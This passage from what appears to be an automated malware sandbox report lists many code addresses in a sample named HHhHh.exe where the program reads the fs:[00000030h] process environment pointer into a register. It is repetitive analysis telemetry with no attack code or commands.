          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01324144 mov ecx, dword ptr fs:[00000030h]4_2_01324144
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01324144 mov eax, dword ptr fs:[00000030h]4_2_01324144
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01324144 mov eax, dword ptr fs:[00000030h]4_2_01324144
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296154 mov eax, dword ptr fs:[00000030h]4_2_01296154
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296154 mov eax, dword ptr fs:[00000030h]4_2_01296154
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128C156 mov eax, dword ptr fs:[00000030h]4_2_0128C156
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D0185 mov eax, dword ptr fs:[00000030h]4_2_012D0185
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131019F mov eax, dword ptr fs:[00000030h]4_2_0131019F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131019F mov eax, dword ptr fs:[00000030h]4_2_0131019F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131019F mov eax, dword ptr fs:[00000030h]4_2_0131019F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131019F mov eax, dword ptr fs:[00000030h]4_2_0131019F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01334180 mov eax, dword ptr fs:[00000030h]4_2_01334180
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01334180 mov eax, dword ptr fs:[00000030h]4_2_01334180
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134C188 mov eax, dword ptr fs:[00000030h]4_2_0134C188
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134C188 mov eax, dword ptr fs:[00000030h]4_2_0134C188
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A197 mov eax, dword ptr fs:[00000030h]4_2_0128A197
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A197 mov eax, dword ptr fs:[00000030h]4_2_0128A197
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A197 mov eax, dword ptr fs:[00000030h]4_2_0128A197
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013661E5 mov eax, dword ptr fs:[00000030h]4_2_013661E5
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C01F8 mov eax, dword ptr fs:[00000030h]4_2_012C01F8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E1D0 mov eax, dword ptr fs:[00000030h]4_2_0130E1D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E1D0 mov eax, dword ptr fs:[00000030h]4_2_0130E1D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0130E1D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E1D0 mov eax, dword ptr fs:[00000030h]4_2_0130E1D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130E1D0 mov eax, dword ptr fs:[00000030h]4_2_0130E1D0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013561C3 mov eax, dword ptr fs:[00000030h]4_2_013561C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013561C3 mov eax, dword ptr fs:[00000030h]4_2_013561C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01326030 mov eax, dword ptr fs:[00000030h]4_2_01326030
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A020 mov eax, dword ptr fs:[00000030h]4_2_0128A020
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128C020 mov eax, dword ptr fs:[00000030h]4_2_0128C020
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01314000 mov ecx, dword ptr fs:[00000030h]4_2_01314000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01332000 mov eax, dword ptr fs:[00000030h]4_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE016 mov eax, dword ptr fs:[00000030h]4_2_012AE016
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE016 mov eax, dword ptr fs:[00000030h]4_2_012AE016
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE016 mov eax, dword ptr fs:[00000030h]4_2_012AE016
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE016 mov eax, dword ptr fs:[00000030h]4_2_012AE016
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BC073 mov eax, dword ptr fs:[00000030h]4_2_012BC073
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01316050 mov eax, dword ptr fs:[00000030h]4_2_01316050
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292050 mov eax, dword ptr fs:[00000030h]4_2_01292050
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013560B8 mov eax, dword ptr fs:[00000030h]4_2_013560B8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013560B8 mov ecx, dword ptr fs:[00000030h]4_2_013560B8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013280A8 mov eax, dword ptr fs:[00000030h]4_2_013280A8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129208A mov eax, dword ptr fs:[00000030h]4_2_0129208A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012980E9 mov eax, dword ptr fs:[00000030h]4_2_012980E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0128A0E3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013160E0 mov eax, dword ptr fs:[00000030h]4_2_013160E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128C0F0 mov eax, dword ptr fs:[00000030h]4_2_0128C0F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D20F0 mov ecx, dword ptr fs:[00000030h]4_2_012D20F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013120DE mov eax, dword ptr fs:[00000030h]4_2_013120DE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA30B mov eax, dword ptr fs:[00000030h]4_2_012CA30B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA30B mov eax, dword ptr fs:[00000030h]4_2_012CA30B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CA30B mov eax, dword ptr fs:[00000030h]4_2_012CA30B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128C310 mov ecx, dword ptr fs:[00000030h]4_2_0128C310
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B0310 mov ecx, dword ptr fs:[00000030h]4_2_012B0310
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133437C mov eax, dword ptr fs:[00000030h]4_2_0133437C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01338350 mov ecx, dword ptr fs:[00000030h]4_2_01338350
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135A352 mov eax, dword ptr fs:[00000030h]4_2_0135A352
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov ecx, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131035C mov eax, dword ptr fs:[00000030h]4_2_0131035C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01312349 mov eax, dword ptr fs:[00000030h]4_2_01312349
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E388 mov eax, dword ptr fs:[00000030h]4_2_0128E388
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E388 mov eax, dword ptr fs:[00000030h]4_2_0128E388
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128E388 mov eax, dword ptr fs:[00000030h]4_2_0128E388
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B438F mov eax, dword ptr fs:[00000030h]4_2_012B438F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B438F mov eax, dword ptr fs:[00000030h]4_2_012B438F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01288397 mov eax, dword ptr fs:[00000030h]4_2_01288397
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01288397 mov eax, dword ptr fs:[00000030h]4_2_01288397
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01288397 mov eax, dword ptr fs:[00000030h]4_2_01288397
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A03E9 mov eax, dword ptr fs:[00000030h]4_2_012A03E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C63FF mov eax, dword ptr fs:[00000030h]4_2_012C63FF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE3F0 mov eax, dword ptr fs:[00000030h]4_2_012AE3F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE3F0 mov eax, dword ptr fs:[00000030h]4_2_012AE3F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE3F0 mov eax, dword ptr fs:[00000030h]4_2_012AE3F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013343D4 mov eax, dword ptr fs:[00000030h]4_2_013343D4
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013343D4 mov eax, dword ptr fs:[00000030h]4_2_013343D4
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A3C0 mov eax, dword ptr fs:[00000030h]4_2_0129A3C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012983C0 mov eax, dword ptr fs:[00000030h]4_2_012983C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012983C0 mov eax, dword ptr fs:[00000030h]4_2_012983C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012983C0 mov eax, dword ptr fs:[00000030h]4_2_012983C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012983C0 mov eax, dword ptr fs:[00000030h]4_2_012983C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013163C0 mov eax, dword ptr fs:[00000030h]4_2_013163C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134C3CD mov eax, dword ptr fs:[00000030h]4_2_0134C3CD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128823B mov eax, dword ptr fs:[00000030h]4_2_0128823B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340274 mov eax, dword ptr fs:[00000030h]4_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128826B mov eax, dword ptr fs:[00000030h]4_2_0128826B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01294260 mov eax, dword ptr fs:[00000030h]4_2_01294260
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296259 mov eax, dword ptr fs:[00000030h]4_2_01296259
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01318243 mov eax, dword ptr fs:[00000030h]4_2_01318243
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01318243 mov ecx, dword ptr fs:[00000030h]4_2_01318243
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128A250 mov eax, dword ptr fs:[00000030h]4_2_0128A250
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02A0 mov eax, dword ptr fs:[00000030h]4_2_012A02A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02A0 mov eax, dword ptr fs:[00000030h]4_2_012A02A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov ecx, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013262A0 mov eax, dword ptr fs:[00000030h]4_2_013262A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE284 mov eax, dword ptr fs:[00000030h]4_2_012CE284
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE284 mov eax, dword ptr fs:[00000030h]4_2_012CE284
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01310283 mov eax, dword ptr fs:[00000030h]4_2_01310283
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A02E1 mov eax, dword ptr fs:[00000030h]4_2_012A02E1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129A2C3 mov eax, dword ptr fs:[00000030h]4_2_0129A2C3
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE53E mov eax, dword ptr fs:[00000030h]4_2_012BE53E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0535 mov eax, dword ptr fs:[00000030h]4_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01326500 mov eax, dword ptr fs:[00000030h]4_2_01326500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364500 mov eax, dword ptr fs:[00000030h]4_2_01364500
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C656A mov eax, dword ptr fs:[00000030h]4_2_012C656A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298550 mov eax, dword ptr fs:[00000030h]4_2_01298550
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298550 mov eax, dword ptr fs:[00000030h]4_2_01298550
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013105A7 mov eax, dword ptr fs:[00000030h]4_2_013105A7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B45B1 mov eax, dword ptr fs:[00000030h]4_2_012B45B1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B45B1 mov eax, dword ptr fs:[00000030h]4_2_012B45B1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C4588 mov eax, dword ptr fs:[00000030h]4_2_012C4588
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292582 mov eax, dword ptr fs:[00000030h]4_2_01292582
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292582 mov ecx, dword ptr fs:[00000030h]4_2_01292582
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE59C mov eax, dword ptr fs:[00000030h]4_2_012CE59C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC5ED mov eax, dword ptr fs:[00000030h]4_2_012CC5ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CC5ED mov eax, dword ptr fs:[00000030h]4_2_012CC5ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012925E0 mov eax, dword ptr fs:[00000030h]4_2_012925E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BE5E7 mov eax, dword ptr fs:[00000030h]4_2_012BE5E7
